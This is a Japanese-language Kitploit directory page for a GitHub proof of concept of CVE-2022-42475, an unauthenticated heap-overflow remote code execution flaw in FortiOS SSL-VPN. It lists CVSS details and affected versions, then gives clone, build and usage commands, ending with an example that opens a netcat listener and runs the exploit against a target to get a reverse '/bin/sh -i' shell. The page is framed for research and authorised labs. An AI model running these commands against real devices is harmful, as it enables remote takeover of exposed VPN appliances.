Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2022-42475-poc — 特定バージョンのFortiOSのSSL-VPNサービスに影響を及ぼす重大なヒープベースのバッファオーバーフロー脆弱性であるCVE-2022-42475の、研究および管理された実験室環境での検証を目的とした概念実証(PoC)。 | Kitploit
ツール/GitHubGitHub/ull0a/cve-2022-42475-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHubull0a/cve-2022-42475-poc

cve-2022-42475-poc

特定バージョンのFortiOSのSSL-VPNサービスに影響を及ぼす重大なヒープベースのバッファオーバーフロー脆弱性であるCVE-2022-42475の、研究および管理された実験室環境での検証を目的とした概念実証(PoC)。

リポジトリを見る
16時間29分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-42475 PoC

Fortinet SSL VPN 事前認証リモートコード実行

説明

CVE-2022-42475 は、FortiOS の SSL VPN サービスにおけるヒープベースのバッファオーバーフローの脆弱性であり、認証されていない攻撃者が /remote/error エンドポイントを標的とした巧妙に細工された HTTP リクエストを通じて、リモートから任意のコードを実行(RCE)できるようにします。

この脆弱性は、公式パッチが公開される前に実際の攻撃で積極的に悪用されていました(0-day)。

PoC の実行

次のスクリーンショットは、許可されたラボ環境での PoC の実行を示しています。

出力は、PoC の実行と、テストに使用された FortiOS インスタンスとのやり取りを示しています。

PoC の実行

CVE 情報

フィールド値
CVE IDCVE-2022-42475
CVSS 3.19.3 (Critical)
ベクターCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-122
発見2022年12月
公式パッチFortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16

影響を受けるバージョン

  • FortiOS 7.2.0–7.2.2
  • FortiOS 7.0.0–7.0.8
  • FortiOS 6.4.0–6.4.10
  • FortiOS 6.2.0–6.2.11
  • FortiOS 6.0.0–6.0.15
  • FortiOS 5.6.0–5.6.14
  • FortiOS 5.4.0–5.4.13
  • FortiOS 5.2.0–5.2.15
  • FortiOS 5.0.0–5.0.14

要件

  • Go 1.18+(PoC のコンパイル用)
  • ポート 443(または設定済みの SSL VPN ポート)のターゲットへのネットワークアクセス
  • テストを実施するための許可されたラボ環境

コンパイル

root@kitploit:~
# ソースコードをクローンまたはダウンロード
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc

# コンパイル
go build -o exploit exploit.go

# または直接実行
go run exploit.go <target> <port> <reverse_ip> <params>

使用方法

root@kitploit:~
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]

例

root@kitploit:~
# 攻撃者側でリスナーを起動
nc -lvnp 80

# エクスプロイトを実行
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i
ツールをダウンロード